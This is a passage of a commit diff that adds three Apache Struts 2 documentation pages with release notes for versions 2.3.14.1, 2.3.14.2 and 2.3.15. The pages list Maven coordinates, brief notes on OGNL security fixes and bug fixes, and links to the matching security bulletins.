+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<HTML>
+ <HEAD>
+ <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+ <STYLE type="text/css">
+ .dp-highlighter {
+ width:95% !important;
+ }
+ </STYLE>
+ <STYLE type="text/css">
+ .footer {
+ background-image: url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+ background-repeat: repeat-x;
+ background-position: left top;
+ padding-top: 4px;
+ color: #666;
+ }
+ </STYLE>
+ <SCRIPT type="text/javascript" language="javascript">
+ var hide = null;
+ var show = null;
+ var children = null;
+
+ function init() {
+ /* Search form initialization */
+ var form = document.forms['search'];
+ if (form != null) {
+ form.elements['domains'].value = location.hostname;
+ form.elements['sitesearch'].value = location.hostname;
+ }
+
+ /* Children initialization */
+ hide = document.getElementById('hide');
+ show = document.getElementById('show');
+ children = document.all != null ?
+ document.all['children'] :
+ document.getElementById('children');
+ if (children != null) {
+ children.style.display = 'none';
+ show.style.display = 'inline';
+ hide.style.display = 'none';
+ }
+ }
+
+ function showChildren() {
+ children.style.display = 'block';
+ show.style.display = 'none';
+ hide.style.display = 'inline';
+ }
+
+ function hideChildren() {
+ children.style.display = 'none';
+ show.style.display = 'inline';
+ hide.style.display = 'none';
+ }
+ </SCRIPT>
+ <TITLE>Version Notes 2.3.14.1</TITLE>
+ <META http-equiv="Content-Type" content="text/html;charset=UTF-8"></HEAD>
+ <BODY onload="init()">
+ <TABLE border="0" cellpadding="2" cellspacing="0" width="100%">
+ <TR class="topBar">
+ <TD align="left" valign="middle" class="topBarDiv" align="left" nowrap="">
+ <A href="home.html" title="Apache Struts 2 Documentation">Apache Struts 2 Documentation</A> > <A href="home.html" title="Home">Home</A> > <A href="guides.html" title="Guides">Guides</A> > <A href="migration-guide.html" title="Migration Guide">Migration Guide</A> > <A href="" title="Version Notes 2.3.14.1">Version Notes 2.3.14.1</A>
+ </TD>
+ <TD align="right" valign="middle" nowrap="">
+ <FORM name="search" action="http://www.google.com/search" method="get">
+ <INPUT type="hidden" name="ie" value="UTF-8">
+ <INPUT type="hidden" name="oe" value="UTF-8">
+ <INPUT type="hidden" name="domains" value="">
+ <INPUT type="hidden" name="sitesearch" value="">
+ <INPUT type="text" name="q" maxlength="255" value="">
+ <INPUT type="submit" name="btnG" value="Google Search">
+ </FORM>
+ </TD>
+ </TR>
+ </TABLE>
+
+ <DIV id="PageContent">
+ <DIV class="pageheader" style="padding: 6px 0px 0px 0px;">
+ <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+ <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+ <DIV style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</DIV>
+ <DIV style="margin: 0px 10px 8px 10px" class="pagetitle">Version Notes 2.3.14.1</DIV>
+
+ <DIV class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+ <A href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31818624">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif" height="16" width="16" border="0" align="absmiddle" title="Edit Page"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31818624">Edit Page</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif" height="16" width="16" border="0" align="absmiddle" title="Browse Space"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31818624">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif" height="16" width="16" border="0" align="absmiddle" title="Add Page"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31818624">Add Page</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31818624">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif" height="16" width="16" border="0" align="absmiddle" title="Add News"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31818624">Add News</A>
+ </DIV>
+ </DIV>
+
+ <DIV class="pagecontent">
+ <DIV class="wiki-content">
+ <P><IMG class="emoticon" src="https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif" height="16" width="16" align="absmiddle" alt="" border="0"> These are the notes for the Struts 2.3.14.1 distribution.</P>
+
+<P><IMG class="emoticon" src="https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif" height="16" width="16" align="absmiddle" alt="" border="0"> For prior notes in this release series, see <A href="version-notes-2314.html" title="Version Notes 2.3.14">Version Notes 2.3.14</A></P>
+
+<UL>
+ <LI>If you are a Maven user, you might want to get started using the <A href="struts-2-maven-archetypes.html" title="Struts 2 Maven Archetypes">Maven Archetype</A>.</LI>
+ <LI>Another quick-start entry point is the <B>blank</B> application. Rename and deploy the WAR as a starting point for your own development.</LI>
+</UL>
+
+
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeHeader panelHeader" style="border-bottom-width: 1px;"><B>Maven Dependency</B></DIV><DIV class="codeContent panelContent">
+<PRE class="code-xml">
+<SPAN class="code-tag"><dependency></SPAN>
+ <SPAN class="code-tag"><groupId></SPAN>org.apache.struts<SPAN class="code-tag"></groupId></SPAN>
+ <SPAN class="code-tag"><artifactId></SPAN>struts2-core<SPAN class="code-tag"></artifactId></SPAN>
+ <SPAN class="code-tag"><version></SPAN>2.3.14.1<SPAN class="code-tag"></version></SPAN>
+<SPAN class="code-tag"></dependency></SPAN>
+</PRE>
+</DIV></DIV>
+
+<P>You can also use Struts Archetype Catalog like below</P>
+
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeHeader panelHeader" style="border-bottom-width: 1px;"><B>Struts Archetype Catalog</B></DIV><DIV class="codeContent panelContent">
+<PRE class="code-none">
+mvn archetype:generate -DarchetypeCatalog=http://struts.apache.org/
+</PRE>
+</DIV></DIV>
+
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeHeader panelHeader" style="border-bottom-width: 1px;"><B>Staging Repository</B></DIV><DIV class="codeContent panelContent">
+<PRE class="code-xml"><SPAN class="code-tag"><repositories></SPAN>
+ <SPAN class="code-tag"><repository></SPAN>
+ <SPAN class="code-tag"><id></SPAN>apache.nexus<SPAN class="code-tag"></id></SPAN>
+ <SPAN class="code-tag"><name></SPAN>ASF Nexus Staging<SPAN class="code-tag"></name></SPAN>
+ <SPAN class="code-tag"><url></SPAN>https://repository.apache.org/content/groups/staging/<SPAN class="code-tag"></url></SPAN>
+ <SPAN class="code-tag"></repository></SPAN>
+<SPAN class="code-tag"></repositories></SPAN></PRE>
+</DIV></DIV>
+
+<H2><A name="VersionNotes2.3.14.1-InternalChanges"></A>Internal Changes</H2>
+
+<UL>
+ <LI>OGNL eval expressions has been disabled by default.</LI>
+</UL>
+
+
+<H3><A name="VersionNotes2.3.14.1-IssueDetail"></A>Issue Detail</H3>
+
+<UL>
+ <LI><A href="https://issues.apache.org/jira/secure/ReleaseNote.jspa?projectId=12311041&version=12324329" class="external-link" rel="nofollow">JIRA Release Notes 2.3.14.1</A></LI>
+ <LI><A href="https://cwiki.apache.org/confluence/display/WW/S2-012" title="S2-012">Security Bulletin S2-012</A></LI>
+ <LI><A href="https://cwiki.apache.org/confluence/display/WW/S2-013" title="S2-013">Security Bulletin S2-013</A></LI>
+</UL>
+
+
+<H3><A name="VersionNotes2.3.14.1-IssueList"></A>Issue List</H3>
+
+<UL>
+ <LI><A href="https://issues.apache.org/jira/issues/?filter=12323897" class="external-link" rel="nofollow">Struts 2.3.14.1 DONE</A></LI>
+ <LI><A href="https://issues.apache.org/jira/issues/?filter=12323783" class="external-link" rel="nofollow">Struts 2.3.15 TODO</A></LI>
+ <LI><A href="https://issues.apache.org/jira/issues/?filter=12318399" class="external-link" rel="nofollow">Struts 2.3.x TODO</A></LI>
+</UL>
+
+
+<H3><A name="VersionNotes2.3.14.1-Otherresources"></A>Other resources</H3>
+
+<UL>
+ <LI><A href="http://www.mail-archive.com/commits@struts.apache.org/" class="external-link" rel="nofollow">Commit Logs (Struts 1 and Struts 2)</A></LI>
+ <LI><A href="http://svn.apache.org/viewvc/struts/struts2/trunk/" class="external-link" rel="nofollow">Source Code Repository (includes change browsing)</A></LI>
+</UL>
+
+ </DIV>
+
+
+ </DIV>
+ </DIV>
+ <DIV class="footer">
+ Generated by
+ <A href="http://www.atlassian.com/confluence/">Atlassian Confluence</A> (Version: 3.4.9 Build: 2042 Feb 14, 2011)
+ <A href="http://could.it/autoexport/">Auto Export Plugin</A> (Version: 1.0.0-dkulp)
+ </DIV>
+ </BODY>
+</HTML>
\ No newline at end of file
Added: websites/production/struts/content/release/2.3.x/docs/version-notes-23142.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/version-notes-23142.html (added)
+++ websites/production/struts/content/release/2.3.x/docs/version-notes-23142.html Sun May 26 21:38:59 2013
@@ -0,0 +1,206 @@
+
+<!--
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements. See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership. The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License. You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE- 2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied. See the License for the
+specific language governing permissions and limitations
+under the License.
+-->
+
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<HTML>
+ <HEAD>
+ <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+ <STYLE type="text/css">
+ .dp-highlighter {
+ width:95% !important;
+ }
+ </STYLE>
+ <STYLE type="text/css">
+ .footer {
+ background-image: url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+ background-repeat: repeat-x;
+ background-position: left top;
+ padding-top: 4px;
+ color: #666;
+ }
+ </STYLE>
+ <SCRIPT type="text/javascript" language="javascript">
+ var hide = null;
+ var show = null;
+ var children = null;
+
+ function init() {
+ /* Search form initialization */
+ var form = document.forms['search'];
+ if (form != null) {
+ form.elements['domains'].value = location.hostname;
+ form.elements['sitesearch'].value = location.hostname;
+ }
+
+ /* Children initialization */
+ hide = document.getElementById('hide');
+ show = document.getElementById('show');
+ children = document.all != null ?
+ document.all['children'] :
+ document.getElementById('children');
+ if (children != null) {
+ children.style.display = 'none';
+ show.style.display = 'inline';
+ hide.style.display = 'none';
+ }
+ }
+
+ function showChildren() {
+ children.style.display = 'block';
+ show.style.display = 'none';
+ hide.style.display = 'inline';
+ }
+
+ function hideChildren() {
+ children.style.display = 'none';
+ show.style.display = 'inline';
+ hide.style.display = 'none';
+ }
+ </SCRIPT>
+ <TITLE>Version Notes 2.3.14.2</TITLE>
+ <META http-equiv="Content-Type" content="text/html;charset=UTF-8"></HEAD>
+ <BODY onload="init()">
+ <TABLE border="0" cellpadding="2" cellspacing="0" width="100%">
+ <TR class="topBar">
+ <TD align="left" valign="middle" class="topBarDiv" align="left" nowrap="">
+ <A href="home.html" title="Apache Struts 2 Documentation">Apache Struts 2 Documentation</A> > <A href="home.html" title="Home">Home</A> > <A href="guides.html" title="Guides">Guides</A> > <A href="migration-guide.html" title="Migration Guide">Migration Guide</A> > <A href="" title="Version Notes 2.3.14.2">Version Notes 2.3.14.2</A>
+ </TD>
+ <TD align="right" valign="middle" nowrap="">
+ <FORM name="search" action="http://www.google.com/search" method="get">
+ <INPUT type="hidden" name="ie" value="UTF-8">
+ <INPUT type="hidden" name="oe" value="UTF-8">
+ <INPUT type="hidden" name="domains" value="">
+ <INPUT type="hidden" name="sitesearch" value="">
+ <INPUT type="text" name="q" maxlength="255" value="">
+ <INPUT type="submit" name="btnG" value="Google Search">
+ </FORM>
+ </TD>
+ </TR>
+ </TABLE>
+
+ <DIV id="PageContent">
+ <DIV class="pageheader" style="padding: 6px 0px 0px 0px;">
+ <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+ <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+ <DIV style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</DIV>
+ <DIV style="margin: 0px 10px 8px 10px" class="pagetitle">Version Notes 2.3.14.2</DIV>
+
+ <DIV class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+ <A href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31822595">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif" height="16" width="16" border="0" align="absmiddle" title="Edit Page"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31822595">Edit Page</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif" height="16" width="16" border="0" align="absmiddle" title="Browse Space"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31822595">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif" height="16" width="16" border="0" align="absmiddle" title="Add Page"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31822595">Add Page</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31822595">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif" height="16" width="16" border="0" align="absmiddle" title="Add News"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31822595">Add News</A>
+ </DIV>
+ </DIV>
+
+ <DIV class="pagecontent">
+ <DIV class="wiki-content">
+ <P><IMG class="emoticon" src="https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif" height="16" width="16" align="absmiddle" alt="" border="0"> These are the notes for the Struts 2.3.14.2 distribution.</P>
+
+<P><IMG class="emoticon" src="https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif" height="16" width="16" align="absmiddle" alt="" border="0"> For prior notes in this release series, see <A href="version-notes-23141.html" title="Version Notes 2.3.14.1">Version Notes 2.3.14.1</A></P>
+
+<UL>
+ <LI>If you are a Maven user, you might want to get started using the <A href="struts-2-maven-archetypes.html" title="Struts 2 Maven Archetypes">Maven Archetype</A>.</LI>
+ <LI>Another quick-start entry point is the <B>blank</B> application. Rename and deploy the WAR as a starting point for your own development.</LI>
+</UL>
+
+
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeHeader panelHeader" style="border-bottom-width: 1px;"><B>Maven Dependency</B></DIV><DIV class="codeContent panelContent">
+<PRE class="code-xml">
+<SPAN class="code-tag"><dependency></SPAN>
+ <SPAN class="code-tag"><groupId></SPAN>org.apache.struts<SPAN class="code-tag"></groupId></SPAN>
+ <SPAN class="code-tag"><artifactId></SPAN>struts2-core<SPAN class="code-tag"></artifactId></SPAN>
+ <SPAN class="code-tag"><version></SPAN>2.3.14.2<SPAN class="code-tag"></version></SPAN>
+<SPAN class="code-tag"></dependency></SPAN>
+</PRE>
+</DIV></DIV>
+
+<P>You can also use Struts Archetype Catalog like below</P>
+
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeHeader panelHeader" style="border-bottom-width: 1px;"><B>Struts Archetype Catalog</B></DIV><DIV class="codeContent panelContent">
+<PRE class="code-none">
+mvn archetype:generate -DarchetypeCatalog=http://struts.apache.org/
+</PRE>
+</DIV></DIV>
+
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeHeader panelHeader" style="border-bottom-width: 1px;"><B>Staging Repository</B></DIV><DIV class="codeContent panelContent">
+<PRE class="code-xml"><SPAN class="code-tag"><repositories></SPAN>
+ <SPAN class="code-tag"><repository></SPAN>
+ <SPAN class="code-tag"><id></SPAN>apache.nexus<SPAN class="code-tag"></id></SPAN>
+ <SPAN class="code-tag"><name></SPAN>ASF Nexus Staging<SPAN class="code-tag"></name></SPAN>
+ <SPAN class="code-tag"><url></SPAN>https://repository.apache.org/content/groups/staging/<SPAN class="code-tag"></url></SPAN>
+ <SPAN class="code-tag"></repository></SPAN>
+<SPAN class="code-tag"></repositories></SPAN></PRE>
+</DIV></DIV>
+
+<H2><A name="VersionNotes2.3.14.2-InternalChanges"></A>Internal Changes</H2>
+
+<UL>
+ <LI>OGNL evaluation for included URL parameters has been dropped</LI>
+</UL>
+
+
+<H3><A name="VersionNotes2.3.14.2-IssueDetail"></A>Issue Detail</H3>
+
+<UL>
+ <LI><A href="https://issues.apache.org/jira/secure/ReleaseNote.jspa?projectId=12311041&version=12324547" class="external-link" rel="nofollow">JIRA Release Notes 2.3.14.2</A></LI>
+ <LI><A href="https://cwiki.apache.org/confluence/display/WW/S2-014" title="S2-014">Security Bulletin S2-014</A></LI>
+</UL>
+
+
+<H3><A name="VersionNotes2.3.14.2-IssueList"></A>Issue List</H3>
+
+<UL>
+ <LI><A href="https://issues.apache.org/jira/issues/?filter=12324170" class="external-link" rel="nofollow">Struts 2.3.14.2 DONE</A></LI>
+ <LI><A href="https://issues.apache.org/jira/issues/?filter=12323783" class="external-link" rel="nofollow">Struts 2.3.15 TODO</A></LI>
+ <LI><A href="https://issues.apache.org/jira/issues/?filter=12318399" class="external-link" rel="nofollow">Struts 2.3.x TODO</A></LI>
+</UL>
+
+
+<H3><A name="VersionNotes2.3.14.2-Otherresources"></A>Other resources</H3>
+
+<UL>
+ <LI><A href="http://www.mail-archive.com/commits@struts.apache.org/" class="external-link" rel="nofollow">Commit Logs (Struts 1 and Struts 2)</A></LI>
+ <LI><A href="http://svn.apache.org/viewvc/struts/struts2/trunk/" class="external-link" rel="nofollow">Source Code Repository (includes change browsing)</A></LI>
+</UL>
+
+ </DIV>
+
+
+ </DIV>
+ </DIV>
+ <DIV class="footer">
+ Generated by
+ <A href="http://www.atlassian.com/confluence/">Atlassian Confluence</A> (Version: 3.4.9 Build: 2042 Feb 14, 2011)
+ <A href="http://could.it/autoexport/">Auto Export Plugin</A> (Version: 1.0.0-dkulp)
+ </DIV>
+ </BODY>
+</HTML>
\ No newline at end of file
Added: websites/production/struts/content/release/2.3.x/docs/version-notes-2315.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/version-notes-2315.html (added)
+++ websites/production/struts/content/release/2.3.x/docs/version-notes-2315.html Sun May 26 21:38:59 2013
@@ -0,0 +1,211 @@
+
+<!--
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements. See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership. The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License. You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE- 2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied. See the License for the
+specific language governing permissions and limitations
+under the License.
+-->
+
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<HTML>
+ <HEAD>
+ <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+ <STYLE type="text/css">
+ .dp-highlighter {
+ width:95% !important;
+ }
+ </STYLE>
+ <STYLE type="text/css">
+ .footer {
+ background-image: url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+ background-repeat: repeat-x;
+ background-position: left top;
+ padding-top: 4px;
+ color: #666;
+ }
+ </STYLE>
+ <SCRIPT type="text/javascript" language="javascript">
+ var hide = null;
+ var show = null;
+ var children = null;
+
+ function init() {
+ /* Search form initialization */
+ var form = document.forms['search'];
+ if (form != null) {
+ form.elements['domains'].value = location.hostname;
+ form.elements['sitesearch'].value = location.hostname;
+ }
+
+ /* Children initialization */
+ hide = document.getElementById('hide');
+ show = document.getElementById('show');
+ children = document.all != null ?
+ document.all['children'] :
+ document.getElementById('children');
+ if (children != null) {
+ children.style.display = 'none';
+ show.style.display = 'inline';
+ hide.style.display = 'none';
+ }
+ }
+
+ function showChildren() {
+ children.style.display = 'block';
+ show.style.display = 'none';
+ hide.style.display = 'inline';
+ }
+
+ function hideChildren() {
+ children.style.display = 'none';
+ show.style.display = 'inline';
+ hide.style.display = 'none';
+ }
+ </SCRIPT>
+ <TITLE>Version Notes 2.3.15</TITLE>
+ <META http-equiv="Content-Type" content="text/html;charset=UTF-8"></HEAD>
+ <BODY onload="init()">
+ <TABLE border="0" cellpadding="2" cellspacing="0" width="100%">
+ <TR class="topBar">
+ <TD align="left" valign="middle" class="topBarDiv" align="left" nowrap="">
+ <A href="home.html" title="Apache Struts 2 Documentation">Apache Struts 2 Documentation</A> > <A href="home.html" title="Home">Home</A> > <A href="guides.html" title="Guides">Guides</A> > <A href="migration-guide.html" title="Migration Guide">Migration Guide</A> > <A href="" title="Version Notes 2.3.15">Version Notes 2.3.15</A>
+ </TD>
+ <TD align="right" valign="middle" nowrap="">
+ <FORM name="search" action="http://www.google.com/search" method="get">
+ <INPUT type="hidden" name="ie" value="UTF-8">
+ <INPUT type="hidden" name="oe" value="UTF-8">
+ <INPUT type="hidden" name="domains" value="">
+ <INPUT type="hidden" name="sitesearch" value="">
+ <INPUT type="text" name="q" maxlength="255" value="">
+ <INPUT type="submit" name="btnG" value="Google Search">
+ </FORM>
+ </TD>
+ </TR>
+ </TABLE>
+
+ <DIV id="PageContent">
+ <DIV class="pageheader" style="padding: 6px 0px 0px 0px;">
+ <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+ <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+ <DIV style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</DIV>
+ <DIV style="margin: 0px 10px 8px 10px" class="pagetitle">Version Notes 2.3.15</DIV>
+
+ <DIV class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+ <A href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31822529">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif" height="16" width="16" border="0" align="absmiddle" title="Edit Page"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31822529">Edit Page</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif" height="16" width="16" border="0" align="absmiddle" title="Browse Space"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31822529">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif" height="16" width="16" border="0" align="absmiddle" title="Add Page"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31822529">Add Page</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31822529">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif" height="16" width="16" border="0" align="absmiddle" title="Add News"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31822529">Add News</A>
+ </DIV>
+ </DIV>
+
+ <DIV class="pagecontent">
+ <DIV class="wiki-content">
+ <P><IMG class="emoticon" src="https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif" height="16" width="16" align="absmiddle" alt="" border="0"> These are the notes for the Struts 2.3.15 distribution.</P>
+
+<P><IMG class="emoticon" src="https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif" height="16" width="16" align="absmiddle" alt="" border="0"> For prior notes in this release series, see <A href="version-notes-23141.html" title="Version Notes 2.3.14.1">Version Notes 2.3.14.1</A></P>
+
+<UL>
+ <LI>If you are a Maven user, you might want to get started using the <A href="struts-2-maven-archetypes.html" title="Struts 2 Maven Archetypes">Maven Archetype</A>.</LI>
+ <LI>Another quick-start entry point is the <B>blank</B> application. Rename and deploy the WAR as a starting point for your own development.</LI>
+</UL>
+
+
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeHeader panelHeader" style="border-bottom-width: 1px;"><B>Maven Dependency</B></DIV><DIV class="codeContent panelContent">
+<PRE class="code-xml">
+<SPAN class="code-tag"><dependency></SPAN>
+ <SPAN class="code-tag"><groupId></SPAN>org.apache.struts<SPAN class="code-tag"></groupId></SPAN>
+ <SPAN class="code-tag"><artifactId></SPAN>struts2-core<SPAN class="code-tag"></artifactId></SPAN>
+ <SPAN class="code-tag"><version></SPAN>2.3.15<SPAN class="code-tag"></version></SPAN>
+<SPAN class="code-tag"></dependency></SPAN>
+</PRE>
+</DIV></DIV>
+
+<P>You can also use Struts Archetype Catalog like below</P>
+
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeHeader panelHeader" style="border-bottom-width: 1px;"><B>Struts Archetype Catalog</B></DIV><DIV class="codeContent panelContent">
+<PRE class="code-none">
+mvn archetype:generate -DarchetypeCatalog=http://struts.apache.org/
+</PRE>
+</DIV></DIV>
+
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeHeader panelHeader" style="border-bottom-width: 1px;"><B>Staging Repository</B></DIV><DIV class="codeContent panelContent">
+<PRE class="code-xml"><SPAN class="code-tag"><repositories></SPAN>
+ <SPAN class="code-tag"><repository></SPAN>
+ <SPAN class="code-tag"><id></SPAN>apache.nexus<SPAN class="code-tag"></id></SPAN>
+ <SPAN class="code-tag"><name></SPAN>ASF Nexus Staging<SPAN class="code-tag"></name></SPAN>
+ <SPAN class="code-tag"><url></SPAN>https://repository.apache.org/content/groups/staging/<SPAN class="code-tag"></url></SPAN>
+ <SPAN class="code-tag"></repository></SPAN>
+<SPAN class="code-tag"></repositories></SPAN></PRE>
+</DIV></DIV>
+
+<H2><A name="VersionNotes2.3.15-InternalChanges"></A>Internal Changes</H2>
+
+<UL>
+ <LI>Merged security fix from version 2.3.14.1</LI>
+ <LI>Resolved problem with memory leak in <TT>ContainerHolder</TT></LI>
+ <LI>Resolved bug related to <TT>struts.convention.action.includeJars</TT></LI>
+ <LI>Improved OSGi support to allow work in Glassfish 3, see <A href="https://issues.apache.org/jira/browse/WW-3958" class="external-link" rel="nofollow">WW-3958</A></LI>
+ <LI>Added support to create cookies from whitin an action <A href="https://issues.apache.org/jira/browse/WW-4037" class="external-link" rel="nofollow">WW-4037</A></LI>
+ <LI>New interface - <TT>ValidationAware</TT> - was added to allow notify actions when there are action/field errors <A href="https://issues.apache.org/jira/browse/WW-4071" class="external-link" rel="nofollow">WW-4071</A></LI>
+ <LI>and other small improvments</LI>
+</UL>
+
+
+<H3><A name="VersionNotes2.3.15-IssueDetail"></A>Issue Detail</H3>
+
+<UL>
+ <LI><A href="https://issues.apache.org/jira/secure/ReleaseNote.jspa?version=12324267&projectId=12311041" class="external-link" rel="nofollow">JIRA Release Notes 2.3.15</A></LI>
+</UL>
+
+
+<H3><A name="VersionNotes2.3.15-IssueList"></A>Issue List</H3>
+
+<UL>
+ <LI><A href="https://issues.apache.org/jira/issues/?filter=12324167" class="external-link" rel="nofollow">Struts 2.3.15 DONE</A></LI>
+ <LI><A href="https://issues.apache.org/jira/issues/?filter=12324168" class="external-link" rel="nofollow">Struts 2.3.16 TODO</A></LI>
+ <LI><A href="https://issues.apache.org/jira/issues/?filter=12318399" class="external-link" rel="nofollow">Struts 2.3.x TODO</A></LI>
+</UL>
+
+
+<H3><A name="VersionNotes2.3.15-Otherresources"></A>Other resources</H3>
+
+<UL>
+ <LI><A href="http://www.mail-archive.com/commits@struts.apache.org/" class="external-link" rel="nofollow">Commit Logs (Struts 1 and Struts 2)</A></LI>
+ <LI><A href="http://svn.apache.org/viewvc/struts/struts2/trunk/" class="external-link" rel="nofollow">Source Code Repository (includes change browsing)</A></LI>
+</UL>
+
+ </DIV>
+
+
+ </DIV>
+ </DIV>
+ <DIV class="footer">
+ Generated by
+ <A href="http://www.atlassian.com/confluence/">Atlassian Confluence</A> (Version: 3.4.9 Build: 2042 Feb 14, 2011)
+ <A href="http://could.it/autoexport/">Auto Export Plugin</A> (Version: 1.0.0-dkulp)
+ </DIV>
+ </BODY>
+</HTML>
\ No newline at end of file